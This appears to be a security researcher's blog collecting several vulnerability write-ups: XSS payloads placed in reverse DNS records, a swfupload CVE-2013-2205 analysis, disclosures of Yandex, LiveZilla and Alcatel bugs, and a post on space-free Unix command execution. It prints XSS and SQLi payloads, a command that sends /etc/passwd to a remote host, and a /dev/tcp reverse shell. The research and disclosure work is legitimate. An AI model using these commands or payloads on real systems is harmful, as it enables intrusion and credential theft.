How Reverse DNS can help us with XSS, SQLi, RCE...

One day I got the idea to put XSS vector into reverse dns record. You know - sometimes webapplication displays IP address AND reverse lookup. As far as people think that there is no need to sanitize displayed revdns records, because as RFC1034 said:

Note that while upper and lower case letters are allowed in domain
names, no significance is attached to the case.  That is, two names with
the same spelling but different case are to be treated as if identical.

The labels must follow the rules for ARPANET host names.  They must
start with a letter, end with a letter or digit, and have as interior
characters only letters, digits, and hyphen.  There are also some
restrictions on the length.  Labels must be 63 characters or less.

...so (theoretically) there is no possibility to have hostname with dangerous characters such as > < ' " and it's XSS safe, right?

Right.

c40957:~ jakub.zoczek$ host 87.204.122.210

210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa.

210.192/26.122.204.87.in-addr.arpa domain name pointer f\"><img/src=http://monitor.ropchain.org/xss.gif>f.x.32s.pl.

That's my blind xss testing IP address. All I need is to visit websites using this address and every time it will be displayed (and interpreted as html) - it should display 1x1 GIF image from my server. In apache log I'll have informations like IP address, User Agent and Referer - so I know where XSS occur.

To configure this kind of environment you will need:

- at least one IPv4 address
- possibility to configure reverse zone on own DNS server.

So - if you have VPS with some IP addresses and possibility to setup reverse dns - it won't work. In most cases configuration of reverse dns is implemented in customer's web panel and restricted to PTR records. If you have possibility to setup CNAME or NS record for your revdns - that's great and it would work. I tried to search for VPS provider who gives this kind of feature for customers and I didn't found single one.

Also - as far as I know - ISP not often want to give such delegations for only few addresses, but there is no problem for full C class or more - they give then for example delegation for all /24 prefix. In Poland - Orange can be solution - there is possibility to setup CNAME records for few addresses.

After months of searching someone who have full class and can borrow me few IP addresses and give delegation - I finally found friend of my who provided me all I need.

So - lets say you have IP address - 1.2.3.4 - the reverse zone configuration for BIND will look like this:


The 1.2.3.4 file:

As you can see - there is no big differences between normal reverse dns configuration. The most important option is check-names ignore; - it will tell BIND that we want to use illegal characters in our DNS records. :)

Problem is that in multiple languages this IP will be resolved normally (with payload), and in others - not. At the moment I checked that it works fine for Linux host, dig, nslookup, Windows nslookup, PHP dns_get_record, python reversename.from_addr(). In future I want to check all other modern languages reverse lookup implementations.

Happy hunting, and btw - check my Yandex.Metrica XSS ;-)

Analysis of swfupload CVE-2013-2205 Security.allowDomain('*') flaw

Intro

Yes - I know it's the old one. As far as I've got lots of stuff to do, I had small amount of time to take a closer look to this vulnerability, found by Szymon Gruszecki and identified by CVE-2013-2205. But I also wanted to understand how to exploit this kind of issues. As far as I couldn't find any usefull PoCs or examples on the Internet - I decided to learn it and make a post. I belive it will be usefull for someone. :)

At first, please take a look to secure swfupload fix for this vuln. Yes - it's just one removed line. :)

Security.allowDomain('*')

It will be short - for details please visit Adobe documentation. Security.allowDomain() is function, which allows flash movie to be embeded and interacted from other domain. For example, we have resource-a.com where swf-a.swf is stored (with Security.allowDomain('resource-b.com')) - we are able to embed swf-a.swf on resource-b.com and interact with all functions that are added through ExternalInterface.addCallback() method.

Depends on context of application, it can be used for example to bypass Same-Policy Origin. How? If our swf-a.swf can make some http requests to hosted resource and get the response that can be passed somehow to our javascript code... you know what's next ;-)

Analysis

Most interesting functions that we should take a look are StartUpload(), ReturnUploadStart(), HTTPError_Handler(), UploadSuccess():

UploadSuccess() is called after successful upload (wow). As we can see, it calls UploadSuccess callback (that can be defined to our own javascript function) with serverData as one of parameters - serverData is content response from requested uploadURL.

The attack

Ok - so if we are able to get content of other resource (SOP bypass), we are able to steal csrf tokens from forms. The attack scenario is simple - zoczus.mooo.com is hosting swfupload from wordpress 3.5.1 on lab.ropchain.org. After victim (logged into wp-admin panel) upload any file, we'll make request to user-new.php, parse response for nonce value, and make standard csrf attack to add other admin account. No other interaction (than file upload) is needed.

I created this proof of concept. Remember to modify wordpress-url to valid Wordpress resource.

Exploit in action:

Yandex Metrica multiple XSS vulnerabilities

Ok, some time ago I found few XSS vulnerabilities at one of Yandex services called Metrika.. Most are fixed now, so I can provide Proof Of Concepts publicly. :)

1) Reflected XSS - [somewhere]

(this one is still not fixed so - it will be disclosed in future, but it's nothing special really)

2) Stored XSS - external links

Demonstration video is quite long because I was creating PoC while recording. ;-)

http://www.youtube.com/watch?v=ZhNn0uYXpL8

3) Stored XSS - WebVisior

Visiting your website with Metrica counter in this way:

http://hostname/x.htm?<img/src="XXX"/onerror="alert(1)">ab

causes that Metrica WebVisior rendered it without escaping, which is just another stored XSS.

4) Stored XSS - file downloads

http://www.youtube.com/watch?v=4xgcjisyzK8

5) Stored XSS - Clickpath analysis

http://www.youtube.com/watch?v=SqTSoCd86Sk

6) Reflected XSS - Form Data analysis

http://www.youtube.com/watch?v=LALvffnT-vQ

7) *BONUS* out of scope (so unrewarded) reflected XSS in yandex.st.

http://yandex.st/mail/neo2/7.35.2005/static/swf/web-socket.swf?onLoad=this.alert('XSS')

Effect + source code:

And that's all for today. :)

[EN] LiveZilla multiple vulnerabilities

I was looking a bit into LiveZilla source code and found few vulnerabilities. Most of them fixed in 5.1.2.1 released few days ago. Details:


CVE-2013-7034 - LiveZilla 5.1.2.0 PHP Object Injection
CVE-2013-7033 - LiveZilla 5.1.2.0 Insecure password storage
CVE-2013-7032 - LiveZilla 5.1.2.0 Multiple Stored XSS in webbased operator client
CVE-2013-7003 - LiveZilla 5.1.1.0 Stored XSS in operator clients
CVE-2013-7002 - LiveZilla 5.1.0.0 Reflected XSS in translations

[EN] Unix RCE without spaces

You have Remote Code Execution bug - but spaces are removed. How to pass parameters in this case? And what if we can't see the result of executed command? Let's do small trick - redirecting default input / output.

Here we go:

zoczus@hell:~$ cat</etc/debian_version 
7.1

:) Can't see the output? Send it through Internet!

[host1]

zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060

[host2]

zoczus@jano:~$ nc -l -p 5060
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
(...)

It looks all right ;) You can also create reverse shell:

sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222

So now the /bin/sh input (commands) will be taken from xxxx.pl:5060 and result - sent to xxxx.pl:2222

I hope this one was useful ;)

[EN] Alcatel OneTouch Website - XSS & SQL Injection

SO - first thing is, that both bugs are really obvious...I can't belive they exist so long in official Alcatel One Touch website.

How to reproduce bug:
1) Go to http://alcatelonetouch.com website
2)  Search for bad'syntax or f<script>alert(1);</script>
3) Get alert or PHP Error (in case you're trying to exploit XSS or SQLi).

XSS:

SQLi:

I think this case is so basic, that it don't need to be explained.

Ok - now the funny part - timeline.

05/02/2013 - discovered the bug
06/02/2013 - contact using e-mail provided in WHOIS database
13/02/2013 - no response, contacted USSupport@tcl.com
11/03/2013 - mailed to Polish Alcatel-Lucent department with request of some contact info for my case
11/03/2013 - response from Alcatel-Lucent - forward me to TCL Communication
12/03/2013 - mail sent using official TCL contact form
13/03/2013 - after googlin' - found some employee working for TCL and contact info - sent mail.
29/04/2013 - no response - tried to contact using info.america@tcl.com
12/06/2013 - still no response, tried to contact with some sales managers, found on Alcatel website
28/06/2013 - Twitted @ALCATELONETOUCH about vuln and requested for contact informations
02/07/2013 - no response - another tweet.
04/07/2013 - stil no response - another tweet
08/07/2013 - ...and another ;)
09/07/2013 - everybody please, sit down - I've got first Alcatel response. It tells that I should contact using their Official Facebook.
09/07/2013 - Contacted using facebook.
10/07/2013 - Response that confirms, that informations about fact, that I found some issue in their website was sent to their "team".
10/07/2013 - Problem was, that I didn't provided any details about vulnerability, even what kind of issue it is ;) I asked if they need any details.
11/07/2013 - I sent really detailed advisory about vulnerability I found.
16/07/2013 - got response with confirmation of sharing my details with their tech team.
24/07/2013 - tried to get some other info - no response
07/08/2013 - ping -> no response.
27/09/2013 - not fixed -> Public Disclosure

Feel free to comment. :)

-- UPDATE --
At 12/11/2013 one of TCL IT Managers responsible for AlcatelOneTouch.com website contacted with me. We cooperated to fix this issues and from now on it's ok. :)

Yandex Bug Bounty - Multiple Vulnerabilities

Few weeks ago I reported few bugs as part of Yandex Bug Bounty Program. Check it out:

1) Cross-Site Flashing  - wordstat.yandex.com

Bug in ammap.swf, that allows us to use configuration files from external resources, modify Flash content and of course - abuse it. :)

This resource is removed at the moment, but here you have payload URL I used:

http://wordstat.yandex.com/flash/ammap/ammap.swf?settings_file=http://myhost/yandex.xml&data_file=http://myhost/evil_data.xml

Configuration files: yandex.xml oraz evil_data.xml

First - check the context menu and new option - 'Download users database from this region' ;)

After clicking - our "database" is prepared to download - information in bottom of site.

When progress is 100% - our payload is executed.

2) Stored XSS - Yandex Maps

I provided short PoC video:

3) Mixed-content - Yandex Video

This one wasn't rewarded and in fact - all modern browsers blocks mixed-content at the moment (also Firefox). Demonstration video just for education purposes and fun ;-)